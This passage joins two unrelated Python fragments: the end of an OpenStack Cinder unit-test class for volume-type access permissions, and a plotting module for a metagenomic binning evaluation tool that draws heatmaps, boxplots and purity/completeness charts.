            {'volume_type_id': fake.VOLUME_TYPE3_ID,
             'project_id': PROJ3_UUID}]}
        result = self.type_access_controller.index(self.req,
                                                   fake.VOLUME_TYPE3_ID)
        self.assertEqual(expected, result)

    def test_list_with_no_context(self):
        req = fakes.HTTPRequest.blank('/v2/flavors/%s/flavors' %
                                      fake.PROJECT_ID)

        def fake_authorize(context, target=None, action=None):
            raise exception.PolicyNotAuthorized(action='index')
        self.stubs.Set(type_access, 'authorize', fake_authorize)

        self.assertRaises(exception.PolicyNotAuthorized,
                          self.type_access_controller.index,
                          req, fake.PROJECT_ID)

    def test_list_type_with_admin_default_proj1(self):
        expected = {'volume_types': [{'id': fake.VOLUME_TYPE_ID},
                                     {'id': fake.VOLUME_TYPE2_ID}]}
        req = fakes.HTTPRequest.blank('/v2/%s/types' % fake.PROJECT_ID,
                                      use_admin_context=True)
        req.environ['cinder.context'].project_id = PROJ1_UUID
        result = self.type_controller_v2.index(req)
        self.assertVolumeTypeListEqual(expected['volume_types'],
                                       result['volume_types'])

    def test_list_type_with_admin_default_proj2(self):
        expected = {'volume_types': [{'id': fake.VOLUME_TYPE_ID},
                                     {'id': fake.VOLUME_TYPE2_ID},
                                     {'id': fake.VOLUME_TYPE3_ID}]}
        req = fakes.HTTPRequest.blank('/v2/%s/types' % PROJ2_UUID,
                                      use_admin_context=True)
        req.environ['cinder.context'].project_id = PROJ2_UUID
        result = self.type_controller_v2.index(req)
        self.assertVolumeTypeListEqual(expected['volume_types'],
                                       result['volume_types'])

    def test_list_type_with_admin_ispublic_true(self):
        expected = {'volume_types': [{'id': fake.VOLUME_TYPE_ID},
                                     {'id': fake.VOLUME_TYPE2_ID}]}
        req = fakes.HTTPRequest.blank('/v2/%s/types?is_public=true' %
                                      fake.PROJECT_ID,
                                      use_admin_context=True)
        result = self.type_controller_v2.index(req)
        self.assertVolumeTypeListEqual(expected['volume_types'],
                                       result['volume_types'])

    def test_list_type_with_admin_ispublic_false(self):
        expected = {'volume_types': [{'id': fake.VOLUME_TYPE3_ID},
                                     {'id': fake.VOLUME_TYPE4_ID}]}
        req = fakes.HTTPRequest.blank('/v2/%s/types?is_public=false' %
                                      fake.PROJECT_ID,
                                      use_admin_context=True)
        result = self.type_controller_v2.index(req)
        self.assertVolumeTypeListEqual(expected['volume_types'],
                                       result['volume_types'])

    def test_list_type_with_admin_ispublic_false_proj2(self):
        expected = {'volume_types': [{'id': fake.VOLUME_TYPE3_ID},
                                     {'id': fake.VOLUME_TYPE4_ID}]}
        req = fakes.HTTPRequest.blank('/v2/%s/types?is_public=false' %
                                      fake.PROJECT_ID,
                                      use_admin_context=True)
        req.environ['cinder.context'].project_id = PROJ2_UUID
        result = self.type_controller_v2.index(req)
        self.assertVolumeTypeListEqual(expected['volume_types'],
                                       result['volume_types'])

    def test_list_type_with_admin_ispublic_none(self):
        expected = {'volume_types': [{'id': fake.VOLUME_TYPE_ID},
                                     {'id': fake.VOLUME_TYPE2_ID},
                                     {'id': fake.VOLUME_TYPE3_ID},
                                     {'id': fake.VOLUME_TYPE4_ID}]}
        req = fakes.HTTPRequest.blank('/v2/%s/types?is_public=none' %
                                      fake.PROJECT_ID,
                                      use_admin_context=True)
        result = self.type_controller_v2.index(req)
        self.assertVolumeTypeListEqual(expected['volume_types'],
                                       result['volume_types'])

    def test_list_type_with_no_admin_default(self):
        expected = {'volume_types': [{'id': fake.VOLUME_TYPE_ID},
                                     {'id': fake.VOLUME_TYPE2_ID}]}
        req = fakes.HTTPRequest.blank('/v2/%s/types' % fake.PROJECT_ID,
                                      use_admin_context=False)
        result = self.type_controller_v2.index(req)
        self.assertVolumeTypeListEqual(expected['volume_types'],
                                       result['volume_types'])

    def test_list_type_with_no_admin_ispublic_true(self):
        expected = {'volume_types': [{'id': fake.VOLUME_TYPE_ID},
                                     {'id': fake.VOLUME_TYPE2_ID}]}
        req = fakes.HTTPRequest.blank('/v2/%s/types?is_public=true' %
                                      fake.PROJECT_ID,
                                      use_admin_context=False)
        result = self.type_controller_v2.index(req)
        self.assertVolumeTypeListEqual(expected['volume_types'],
                                       result['volume_types'])

    def test_list_type_with_no_admin_ispublic_false(self):
        expected = {'volume_types': [{'id': fake.VOLUME_TYPE_ID},
                                     {'id': fake.VOLUME_TYPE2_ID}]}
        req = fakes.HTTPRequest.blank('/v2/%s/types?is_public=false' %
                                      fake.PROJECT_ID,
                                      use_admin_context=False)
        result = self.type_controller_v2.index(req)
        self.assertVolumeTypeListEqual(expected['volume_types'],
                                       result['volume_types'])

    def test_list_type_with_no_admin_ispublic_none(self):
        expected = {'volume_types': [{'id': fake.VOLUME_TYPE_ID},
                                     {'id': fake.VOLUME_TYPE2_ID}]}
        req = fakes.HTTPRequest.blank('/v2/%s/types?is_public=none' %
                                      fake.PROJECT_ID,
                                      use_admin_context=False)
        result = self.type_controller_v2.index(req)
        self.assertVolumeTypeListEqual(expected['volume_types'],
                                       result['volume_types'])

    def test_show(self):
        resp = FakeResponse()
        self.type_action_controller.show(self.req, resp, fake.VOLUME_TYPE_ID)
        self.assertEqual({'id': fake.VOLUME_TYPE_ID,
                          'os-volume-type-access:is_public': True},
                         resp.obj['volume_type'])

    def test_detail(self):
        resp = FakeResponse()
        self.type_action_controller.detail(self.req, resp)
        self.assertEqual(
            [{'id': fake.VOLUME_TYPE_ID,
              'os-volume-type-access:is_public': True},
             {'id': fake.VOLUME_TYPE3_ID,
              'os-volume-type-access:is_public': False}],
            resp.obj['volume_types'])

    def test_create(self):
        resp = FakeResponse()
        self.type_action_controller.create(self.req, {}, resp)
        self.assertEqual({'id': fake.VOLUME_TYPE_ID,
                          'os-volume-type-access:is_public': True},
                         resp.obj['volume_type'])

    def test_add_project_access(self):
        def stub_add_volume_type_access(context, type_id, project_id):
            self.assertEqual(fake.VOLUME_TYPE4_ID, type_id, "type_id")
            self.assertEqual(PROJ2_UUID, project_id, "project_id")
        self.stubs.Set(db, 'volume_type_access_add',
                       stub_add_volume_type_access)
        body = {'addProjectAccess': {'project': PROJ2_UUID}}
        req = fakes.HTTPRequest.blank('/v2/%s/types/%s/action' % (
            fake.PROJECT_ID, fake.VOLUME_TYPE3_ID),
            use_admin_context=True)
        result = self.type_action_controller._addProjectAccess(
            req, fake.VOLUME_TYPE4_ID, body)
        self.assertEqual(202, result.status_code)

    def test_add_project_access_with_no_admin_user(self):
        req = fakes.HTTPRequest.blank('/v2/%s/types/%s/action' % (
            fake.PROJECT_ID, fake.VOLUME_TYPE3_ID),
            use_admin_context=False)
        body = {'addProjectAccess': {'project': PROJ2_UUID}}
        self.assertRaises(exception.PolicyNotAuthorized,
                          self.type_action_controller._addProjectAccess,
                          req, fake.VOLUME_TYPE3_ID, body)

    def test_add_project_access_with_already_added_access(self):
        def stub_add_volume_type_access(context, type_id, project_id):
            raise exception.VolumeTypeAccessExists(volume_type_id=type_id,
                                                   project_id=project_id)
        self.stubs.Set(db, 'volume_type_access_add',
                       stub_add_volume_type_access)
        body = {'addProjectAccess': {'project': PROJ2_UUID}}
        req = fakes.HTTPRequest.blank('/v2/%s/types/%s/action' % (
            fake.PROJECT_ID, fake.VOLUME_TYPE3_ID), use_admin_context=True)
        self.assertRaises(webob.exc.HTTPConflict,
                          self.type_action_controller._addProjectAccess,
                          req, fake.VOLUME_TYPE3_ID, body)

    def test_remove_project_access_with_bad_access(self):
        def stub_remove_volume_type_access(context, type_id, project_id):
            raise exception.VolumeTypeAccessNotFound(volume_type_id=type_id,
                                                     project_id=project_id)
        self.stubs.Set(db, 'volume_type_access_remove',
                       stub_remove_volume_type_access)
        body = {'removeProjectAccess': {'project': PROJ2_UUID}}
        req = fakes.HTTPRequest.blank('/v2/%s/types/%s/action' % (
            fake.PROJECT_ID, fake.VOLUME_TYPE3_ID), use_admin_context=True)
        self.assertRaises(webob.exc.HTTPNotFound,
                          self.type_action_controller._removeProjectAccess,
                          req, fake.VOLUME_TYPE4_ID, body)

    def test_remove_project_access_with_no_admin_user(self):
        req = fakes.HTTPRequest.blank('/v2/%s/types/%s/action' % (
            fake.PROJECT_ID, fake.VOLUME_TYPE3_ID), use_admin_context=False)
        body = {'removeProjectAccess': {'project': PROJ2_UUID}}
        self.assertRaises(exception.PolicyNotAuthorized,
                          self.type_action_controller._removeProjectAccess,
                          req, fake.VOLUME_TYPE3_ID, body)

# Copyright 2020 Department of Computational Biology for Infection Research - Helmholtz Centre for Infection Research
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <https://www.gnu.org/licenses/>.

from src.utils import labels as utils_labels
from src.utils import load_ncbi_taxinfo
from src import binning_classes
import matplotlib
matplotlib.use('Agg')
import seaborn as sns
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
import matplotlib.ticker as ticker
import numpy as np
import os, sys, inspect
import pandas as pd
from collections import OrderedDict
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0, parentdir)


def create_colors_list():
    colors_list = []
    for color in plt.cm.tab10(np.linspace(0, 1, 10))[:-1]:
        colors_list.append(tuple(color))
    colors_list.append("black")
    for color in plt.cm.Set2(np.linspace(0, 1, 8)):
        colors_list.append(tuple(color))
    for color in plt.cm.Set3(np.linspace(0, 1, 12)):
        colors_list.append(tuple(color))
    return colors_list


def create_legend(color_indices, available_tools, output_dir):
    colors_list = create_colors_list()
    if color_indices:
        colors_list = [colors_list[i] for i in color_indices]

    colors_iter = iter(colors_list)
    circles = [Line2D([], [], markeredgewidth=0.0, linestyle="None", marker="o", markersize=10, markerfacecolor=next(colors_iter)) for label in available_tools]

    fig = plt.figure(figsize=(0.5, 0.5))
    fig.legend(circles, available_tools, loc='center', frameon=False, ncol=5, handletextpad=0.1)
    fig.savefig(os.path.join(output_dir, 'genome', 'legend.pdf'), dpi=100, format='pdf', bbox_inches='tight')
    plt.close(fig)


def plot_precision_vs_bin_size(pd_bins, output_dir):
    pd_plot = pd_bins[pd_bins[utils_labels.TOOL] != utils_labels.GS]

    for tool_label, pd_tool in pd_plot.groupby(utils_labels.TOOL):
        fig, axs = plt.subplots(figsize=(5, 4.5))
        axs.scatter(np.log(pd_tool['total_length']), pd_tool['precision_bp'], marker='o')

        axs.set_xlim([None, np.log(pd_tool['total_length'].max())])
        axs.set_ylim([0.0, 1.0])
        axs.set_title(tool_label, fontsize=12)

        plt.ylabel('Purity per bin (%)', fontsize=12)
        plt.xlabel('Bin size [log(# bp)]', fontsize=12)

        fig.savefig(os.path.join(output_dir, 'genome', tool_label, 'purity_vs_bin_size.png'), dpi=200, format='png', bbox_inches='tight')
        plt.close(fig)


def plot_by_genome_coverage(pd_bins, pd_target_column, available_tools, output_dir):
    colors_list = create_colors_list()
    if len(available_tools) > len(colors_list):
        raise RuntimeError("Plot only supports 29 colors")

    fig, axs = plt.subplots(figsize=(5, 4.5))

    for i, (color, tool) in enumerate(zip(colors_list, available_tools)):
        pd_tool = pd_bins[pd_bins[utils_labels.TOOL] == tool].sort_values(by=['genome_index'])
        axs.scatter(pd_tool['genome_coverage'], pd_tool[pd_target_column], marker='o', color=colors_list[i], s=[3] * pd_tool.shape[0])
        window = 50
        rolling_mean = pd_tool[pd_target_column].rolling(window=window, min_periods=10).mean()
        axs.plot(pd_tool['genome_coverage'], rolling_mean, color=colors_list[i])

    axs.set_ylim([-0.01, 1.01])

    axs.set_xticklabels(['{:,.1f}'.format(np.exp(x)) for x in axs.get_xticks()], fontsize=12)
    axs.set_yticklabels(['{:3.0f}'.format(x * 100) for x in axs.get_yticks()], fontsize=12)

    axs.tick_params(axis='x', labelsize=12)

    if pd_target_column == 'precision_bp':
        ylabel = 'Purity per bin (%)'
        file_name = 'purity_by_genome_coverage'
    else:
        ylabel = 'Completeness per genome (%)'
        file_name = 'completeness_by_genome_coverage'

    plt.ylabel(ylabel, fontsize=15)
    plt.xlabel('Average genome coverage', fontsize=15)

    colors_iter = iter(colors_list)
    circles = []
    for x in range(len(available_tools)):
        circles.append(Line2D([], [], markeredgewidth=0.0, linestyle="None", marker="o", markersize=11, markerfacecolor=next(colors_iter)))
    lgd = plt.legend(circles, available_tools, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0., handlelength=0, frameon=False, fontsize=14)

    fig.savefig(os.path.join(output_dir, 'genome', file_name + '.pdf'), dpi=100, format='pdf', bbox_extra_artists=(lgd,), bbox_inches='tight')
    plt.close(fig)


def get_pd_genomes_recall(sample_id_to_queries_list):
    pd_genomes_recall = pd.DataFrame()
    for sample_id in sample_id_to_queries_list:
        for query in sample_id_to_queries_list[sample_id]:
            if not isinstance(query, binning_classes.GenomeQuery):
                continue
            recall_df = query.recall_df_cami1[['genome_id', 'recall_bp']].copy()
            recall_df[utils_labels.TOOL] = query.label
            recall_df['sample_id'] = sample_id
            recall_df = recall_df.reset_index().set_index(['sample_id', utils_labels.TOOL])
            pd_genomes_recall = pd.concat([pd_genomes_recall, recall_df])
    return pd_genomes_recall


def plot_precision_recall_by_coverage(sample_id_to_queries_list, pd_bins_g, coverages_pd, available_tools, output_dir):
    # compute average genome coverage if coverages for multiple samples were provided
    coverages_pd = coverages_pd.groupby(['GENOMEID']).mean()
    coverages_pd.rename(columns={'GENOMEID': 'genome_id'})
    coverages_pd = coverages_pd.sort_values(by=['COVERAGE'])
    coverages_pd['rank'] = coverages_pd['COVERAGE'].rank()

    pd_genomes_recall = get_pd_genomes_recall(sample_id_to_queries_list)
    pd_genomes_recall['genome_index'] = pd_genomes_recall['genome_id'].map(coverages_pd['rank'].to_dict())
    pd_genomes_recall = pd_genomes_recall.reset_index()
    pd_genomes_recall['genome_coverage'] = np.log(pd_genomes_recall['genome_id'].map(coverages_pd['COVERAGE'].to_dict()))
    plot_by_genome_coverage(pd_genomes_recall, 'recall_bp', available_tools, output_dir)

    pd_bins_precision = pd_bins_g[[utils_labels.TOOL, 'precision_bp', 'genome_id']].copy().dropna(subset=['precision_bp'])
    pd_bins_precision['genome_index'] = pd_bins_precision['genome_id'].map(coverages_pd['rank'].to_dict())
    pd_bins_precision['genome_coverage'] = np.log(pd_bins_precision['genome_id'].map(coverages_pd['COVERAGE'].to_dict()))
    plot_by_genome_coverage(pd_bins_precision, 'precision_bp', available_tools, output_dir)


def plot_heatmap(df_confusion, sample_id, output_dir, label, separate_bar=False, log_scale=False):
    if log_scale:
        df_confusion = df_confusion.apply(np.log10, inplace=True).replace(-np.inf, 0)
    fig, axs = plt.subplots(figsize=(10, 8))
    fontsize = 20

    # replace columns and rows labels by numbers
    d = {value: key for (key, value) in enumerate(df_confusion.columns.tolist(), 1)}
    df_confusion = df_confusion.rename(index=str, columns=d)
    df_confusion.index = range(1, len(df_confusion) + 1)

    xticklabels = int(round(df_confusion.shape[1] / 10, -1))
    yticklabels = int(round(df_confusion.shape[0] / 10, -1))
    sns_plot = sns.heatmap(df_confusion, ax=axs, annot=False, cmap="YlGnBu_r", xticklabels=xticklabels, yticklabels=yticklabels, cbar=False, rasterized=True)

    # sns_plot = sns.heatmap(df_confusion, ax=axs, annot=False, cmap="YlGnBu_r", xticklabels=False, yticklabels=False, cbar=True, rasterized=True)
    sns_plot.set_xlabel("Genomes", fontsize=fontsize)
    sns_plot.set_ylabel("Predicted bins", fontsize=fontsize)
    plt.yticks(fontsize=12, rotation=0)
    plt.xticks(fontsize=12)

    mappable = sns_plot.get_children()[0]

    cbar_ax = fig.add_axes([.915, .11, .017, .77])
    cbar = plt.colorbar(mappable, ax=axs, cax=cbar_ax, orientation='vertical')
    if log_scale:
        cbar.set_label(fontsize=fontsize, label='log$_{10}$(# bp)')
    else:
        fmt = lambda x, pos: '{:.0f}'.format(x / 1000000)
        cbar = plt.colorbar(mappable, ax=axs, cax=cbar_ax, orientation='vertical', format=ticker.FuncFormatter(fmt))
        cbar.set_label(fontsize=fontsize, label='Millions of base pairs')

    cbar.ax.tick_params(labelsize=fontsize)
    cbar.outline.set_edgecolor(None)

    axs.set_title(label, fontsize=fontsize, pad=10)

    axs.set_ylim([len(df_confusion), 0])

    # plt.yticks(fontsize=14, rotation=0)
    # plt.xticks(fontsize=14)

    output_dir = os.path.join(output_dir, 'genome', label)

    fig.savefig(os.path.join(output_dir, 'heatmap_' + sample_id + '.pdf'), dpi=100, format='pdf', bbox_inches='tight')
    fig.savefig(os.path.join(output_dir, 'heatmap_' + sample_id + '.png'), dpi=200, format='png', bbox_inches='tight')
    plt.close(fig)

    if not separate_bar:
        return

    # create separate figure for bar
    fig = plt.figure(figsize=(6, 6))
    mappable = sns_plot.get_children()[0]
    fmt = lambda x, pos: '{:.0f}'.format(x / 1000000)

    cbar = plt.colorbar(mappable, orientation='vertical', label='[millions of base pairs]', format=ticker.FuncFormatter(fmt))

    text = cbar.ax.yaxis.label
    font = matplotlib.font_manager.FontProperties(size=16)
    text.set_font_properties(font)

    cbar.outline.set_visible(False)
    cbar.ax.tick_params(labelsize=14)

    # store separate bar figure
    plt.gca().set_visible(False)
    fig.savefig(os.path.join(output_dir, 'heatmap_bar.pdf'), dpi=100, format='pdf', bbox_inches='tight')

    plt.close(fig)


def plot_boxplot(sample_id_to_queries_list, metric_name, output_dir, available_tools):
    pd_bins = pd.DataFrame()
    for sample_id in sample_id_to_queries_list:
        for query in sample_id_to_queries_list[sample_id]:
            metric_df = getattr(query, metric_name.replace('_bp', '_df')).copy()
            metric_df[utils_labels.TOOL] = query.label
            metric_df['sample_id'] = sample_id
            metric_df = metric_df.reset_index().set_index(['sample_id', utils_labels.TOOL])
            pd_bins = pd.concat([pd_bins, metric_df])

    metric_all = []

    for tool in available_tools:
        pd_tool = pd_bins.iloc[pd_bins.index.get_level_values(utils_labels.TOOL) == tool]
        metric_all.append(pd_tool[metric_name][pd_tool[metric_name].notnull()].tolist())

    fig, axs = plt.subplots(figsize=(6, 5))

    medianprops = dict(linewidth=2.5, color='gold')
    bplot = axs.boxplot(metric_all, notch=0, vert=0, patch_artist=True, labels=available_tools, medianprops=medianprops, sym='k.')
    colors_iter = iter(create_colors_list())

    # turn on grid
    axs.grid(which='major', linestyle=':', linewidth='0.5', color='lightgrey')

    # force axes to be from 0 to 100%
    axs.set_xlim([-0.01, 1.01])

    # transform plot_labels to percentages
    vals = axs.get_xticks()
    axs.set_xticklabels(['{:3.0f}'.format(x * 100) for x in vals])

    # enable code to rotate labels
    tick_labels = axs.get_yticklabels()
    plt.setp(tick_labels, fontsize=13) ## rotation=55

    for box in bplot['boxes']:
        box.set(facecolor=next(colors_iter), linewidth=0.1)
    plt.ylim(plt.ylim()[::-1])

    if metric_name == 'precision_bp':
        axs.set_xlabel('Purity per bin (%)', fontsize=13)
        metric_name = 'purity_bp'
    else:
        axs.set_xlabel('Completeness per genome (%)', fontsize=13)
        metric_name = 'completeness_bp'

    fig.savefig(os.path.join(output_dir, 'genome', 'boxplot_' + metric_name + '.pdf'), dpi=100, format='pdf', bbox_inches='tight')
    fig.savefig(os.path.join(output_dir, 'genome', 'boxplot_' + metric_name + '.png'), dpi=200, format='png', bbox_inches='tight')

    # remove labels but keep grid
    # axs.get_yaxis().set_ticklabels([])
    # for tic in axs.yaxis.get_major_ticks():
    #     tic.tick1line.set_visible(False)
    #     tic.tick2line.set_visible(False)
    #     tic.label1.set_visible(False)
    #     tic.label2.set_visible(False)
    # fig.savefig(os.path.join(output_dir, 'genome', 'boxplot_' + metric_name + '_wo_legend.pdf'), dpi=100, format='pdf', bbox_inches='tight')
    plt.close(fig)


def plot_summary(color_indices, df_results, labels, output_dir, rank, plot_type, file_name, xlabel, ylabel):
    available_tools = df_results[utils_labels.TOOL].unique()
    tools = [tool for tool in labels if tool in available_tools]

    colors_list = create_colors_list()
    if color_indices:
        colors_list = [colors_list[i] for i in color_indices]
    df_mean = df_results.groupby(utils_labels.TOOL).mean().reindex(tools)

    binning_type = df_results[utils_labels.BINNING_TYPE].iloc[0]

    if len(df_mean) > len(colors_list):
        raise RuntimeError("Plot only supports 29 colors")

    fig, axs = plt.subplots(figsize=(5, 4.5))

    # force axes to be from 0 to 100%
    axs.set_xlim([0.0, 1.0])
    axs.set_ylim([0.0, 1.0])

    if plot_type == 'e':
        for i, (tool, df_row) in enumerate(df_mean.iterrows()):
            axs.errorbar(df_row[utils_labels.AVG_PRECISION_BP], df_row[utils_labels.AVG_RECALL_BP], xerr=df_row['avg_precision_bp_var'], yerr=df_row['avg_recall_bp_var'],
                         fmt='o',
                         ecolor=colors_list[i],
                         mec=colors_list[i],
                         mfc=colors_list[i],
                         capsize=3,
                         markersize=8)
    if plot_type == 'f':
        for i, (tool, df_row) in enumerate(df_mean.iterrows()):
            axs.errorbar(df_row[utils_labels.AVG_PRECISION_SEQ], df_row[utils_labels.AVG_RECALL_SEQ], xerr=df_row[utils_labels.AVG_PRECISION_SEQ_SEM], yerr=df_row[utils_labels.AVG_RECALL_SEQ_SEM],
                         fmt='o',
                         ecolor=colors_list[i],
                         mec=colors_list[i],
                         mfc=colors_list[i],
                         capsize=3,
                         markersize=8)
    if plot_type == 'w':
        for i, (tool, df_row) in enumerate(df_mean.iterrows()):
            axs.plot(df_row[utils_labels.PRECISION_PER_BP], df_row[utils_labels.RECALL_PER_BP], marker='o', color=colors_list[i], markersize=10)
    if plot_type == 'x':
        for i, (tool, df_row) in enumerate(df_mean.iterrows()):
            axs.plot(df_row[utils_labels.PRECISION_PER_SEQ], df_row[utils_labels.RECALL_PER_SEQ], marker='o', color=colors_list[i], markersize=10)
    elif plot_type == 'p':
        for i, (tool, df_row) in enumerate(df_mean.iterrows()):
            axs.plot(df_row[utils_labels.ARI_BY_BP], df_row[utils_labels.PERCENTAGE_ASSIGNED_BPS], marker='o', color=colors_list[i], markersize=10)

    # turn on grid
    # axs.minorticks_on()
    axs.grid(which='major', linestyle=':', linewidth='0.5')
    # axs.grid(which='minor', linestyle=':', linewidth='0.5')

    # transform plot_labels to percentages
    if plot_type != 'p':
        vals = axs.get_xticks()
        axs.set_xticklabels(['{:3.0f}'.format(x * 100) for x in vals], fontsize=11)
    else:
        axs.tick_params(axis='x', labelsize=12)
    vals = axs.get_yticks()
    axs.set_yticklabels(['{:3.0f}'.format(x * 100) for x in vals], fontsize=11)

    if rank:
        file_name = rank + '_' + file_name
        plt.title(rank)
        ylabel = ylabel.replace('genome', 'taxon')

    plt.xlabel(xlabel, fontsize=13)
    plt.ylabel(ylabel, fontsize=13)
    plt.tight_layout()
    fig.savefig(os.path.join(output_dir, binning_type, file_name + '.eps'), dpi=100, format='eps', bbox_inches='tight')

    colors_iter = iter(colors_list)
    circles = []
    for x in range(len(df_mean)):
        circles.append(Line2D([], [], markeredgewidth=0.0, linestyle="None", marker="o", markersize=11, markerfacecolor=next(colors_iter)))
    lgd = plt.legend(circles, tools, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0., handlelength=0, frameon=False, fontsize=12)

    fig.savefig(os.path.join(output_dir, binning_type, file_name + '.pdf'), dpi=100, format='pdf', bbox_extra_artists=(lgd,), bbox_inches='tight')
    fig.savefig(os.path.join(output_dir, binning_type, file_name + '.png'), dpi=200, format='png', bbox_extra_artists=(lgd,), bbox_inches='tight')
    plt.close(fig)


def plot_avg_precision_recall(colors, df_results, labels, output_dir, rank=None):
    plot_summary(colors,
                 df_results,
                 labels,
                 output_dir,
                 rank,
                 'e',
                 'avg_purity_completeness_bp',
                 'Average purity per bin (%)',
                 'Average completeness per genome (%)')
    plot_summary(colors,
                 df_results,
                 labels,
                 output_dir,
                 rank,
                 'f',
                 'avg_purity_completeness_seq',
                 'Average purity per bin (%)',
                 'Average completeness per genome (%)')


def plot_precision_recall(colors, summary_per_query, labels, output_dir, rank=None):
    plot_summary(colors,
                 summary_per_query,
                 labels,
                 output_dir,
                 rank,
                 'w',
                 'purity_recall_bp',
                 'Purity for sample (%)',
                 'Completeness for sample (%)')
    plot_summary(colors,
                 summary_per_query,
                 labels,
                 output_dir,
                 rank,
                 'x',
                 'purity_completeness_seq',
                 'Purity for sample (%)',
                 'Completeness for sample (%)')


def plot_adjusted_rand_index_vs_assigned_bps(colors, summary_per_query, labels, output_dir, rank=None):
    plot_summary(colors,
                 summary_per_query,
                 labels,
                 output_dir,
                 rank,
                 'p',
                 'ari_vs_assigned_bps',
                 'Adjusted Rand index',
                 'Percentage of binned base pairs')


def plot_taxonomic_results(df_summary_t, metrics_list, errors_list, file_name, output_dir):
    colors_list = ["#006cba", "#008000", "#ba9e00", "red"]

    for tool, pd_results in df_summary_t.groupby(utils_labels.TOOL):
        dict_metric_list = []
        for metric in metrics_list:
            rank_to_metric = OrderedDict([(k, .0) for k in load_ncbi_taxinfo.RANKS])
            dict_metric_list.append(rank_to_metric)
        dict_error_list = []
        for error in errors_list:
            rank_to_metric_error = OrderedDict([(k, .0) for k in load_ncbi_taxinfo.RANKS])
            dict_error_list.append(rank_to_metric_error)

        for index, row in pd_results.iterrows():
            for rank_to_metric, metric in zip(dict_metric_list, metrics_list):
                rank_to_metric[row[utils_labels.RANK]] = .0 if np.isnan(row[metric]) else row[metric]
            for rank_to_metric_error, error in zip(dict_error_list, errors_list):
                rank_to_metric_error[row[utils_labels.RANK]] = .0 if np.isnan(row[error]) else row[error]

        fig, axs = plt.subplots(figsize=(6, 5))

        # force axes to be from 0 to 100%
        axs.set_xlim([0, 7])
        axs.set_ylim([0.0, 1.0])
        x_values = range(len(load_ncbi_taxinfo.RANKS))

        y_values_list = []
        for rank_to_metric, color in zip(dict_metric_list, colors_list):
            y_values = list(rank_to_metric.values())
            axs.plot(x_values, y_values, color=color)
            y_values_list.append(y_values)

        for rank_to_metric_error, y_values, color in zip(dict_error_list, y_values_list, colors_list):
            sem = list(rank_to_metric_error.values())
            plt.fill_between(x_values, np.subtract(y_values, sem).tolist(), np.add(y_values, sem).tolist(), color=color, alpha=0.5)

        plt.xticks(x_values, load_ncbi_taxinfo.RANKS, rotation='vertical')

        vals = axs.get_yticks()
        axs.set_yticklabels(['{:3.0f}%'.format(x * 100) for x in vals])

        lgd = plt.legend(metrics_list, loc=1, borderaxespad=0., handlelength=2, frameon=False)

        plt.tight_layout()
        fig.savefig(os.path.join(output_dir, 'taxonomic', tool, file_name + '.png'), dpi=100, format='png', bbox_extra_artists=(lgd,), bbox_inches='tight')
        fig.savefig(os.path.join(output_dir, 'taxonomic', tool, file_name + '.pdf'), dpi=100, format='pdf', bbox_extra_artists=(lgd,), bbox_inches='tight')
        plt.close(fig)


def create_contamination_column(pd_tool_bins):
    pd_tool_bins['newcolumn'] = 1 - pd_tool_bins['precision_bp']


def create_completeness_minus_contamination_column(pd_tool_bins):
    pd_tool_bins['newcolumn'] = pd_tool_bins['recall_bp'] + pd_tool_bins['precision_bp'] - 1


def plot_contamination(pd_bins, binning_type, title, xlabel, ylabel, create_column_function, output_dir):
    if len(pd_bins) == 0:
        return

    pd_bins_copy = pd_bins[[utils_labels.TOOL, 'precision_bp', 'recall_bp']].copy().dropna(subset=['precision_bp'])
    create_column_function(pd_bins_copy)

    colors_list = create_colors_list()

    fig, axs = plt.subplots(figsize=(6, 5))

    tools = pd_bins_copy[utils_labels.TOOL].unique().tolist()

    for color, tool in zip(colors_list, tools):
        pd_tool_bins = pd_bins_copy[pd_bins_copy[utils_labels.TOOL] == tool]
        pd_tool_bins = pd_tool_bins.sort_values(by='newcolumn', ascending=False).reset_index()
        pd_tool_bins = pd_tool_bins.drop(['index'], axis=1)

        axs.plot(list(range(1, len(pd_tool_bins) + 1)), pd_tool_bins['newcolumn'], color=color)

    min_value = pd_bins_copy['newcolumn'].min()
    axs.set_ylim(min_value if min_value < 1.0 else .9, 1.0)
    axs.set_xlim(1, None)
    axs.grid(which='major', linestyle='-', linewidth='0.5', color='lightgrey')

    # transform plot_labels to percentages
    vals = axs.get_yticks()
    axs.set_yticklabels(['{:3.0f}'.format(y * 100) for y in vals])

    plt.xlabel(xlabel, fontsize=14)
    plt.ylabel(ylabel + ' [%]', fontsize=14)

    lgd = plt.legend(tools, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0., handlelength=1, frameon=False, fontsize=12)

    plt.tight_layout()

    file_name = title.lower().replace(' ', '_').replace('-', 'minus').replace('|', '')
    fig.savefig(os.path.join(output_dir, binning_type, file_name + '.png'), dpi=100, format='png', bbox_extra_artists=(lgd,), bbox_inches='tight')
    fig.savefig(os.path.join(output_dir, binning_type, file_name + '.pdf'), dpi=100, format='pdf', bbox_extra_artists=(lgd,), bbox_inches='tight')
    plt.close(fig)


def get_number_of_hq_bins(tools, pd_bins):
    pd_counts = pd.DataFrame()
    pd_bins_copy = pd_bins[[utils_labels.TOOL, 'precision_bp', 'recall_bp']].copy().dropna(subset=['precision_bp'])
    for tool in tools:
        pd_tool_bins = pd_bins_copy[pd_bins_copy[utils_labels.TOOL] == tool]
        x50 = pd_tool_bins[(pd_tool_bins['recall_bp'] > .5) & (pd_tool_bins['precision_bp'] > .9)].shape[0]
        x70 = pd_tool_bins[(pd_tool_bins['recall_bp'] > .7) & (pd_tool_bins['precision_bp'] > .9)].shape[0]
        x90 = pd_tool_bins[(pd_tool_bins['recall_bp'] > .9) & (pd_tool_bins['precision_bp'] > .9)].shape[0]
        pd_tool_counts = pd.DataFrame([[x90, x70, x50]], columns=['>90%', '>70%', '>50%'], index=[tool])
        pd_counts = pd_counts.append(pd_tool_counts)
    return pd_counts


def get_number_of_hq_bins_by_score(tools, pd_bins):
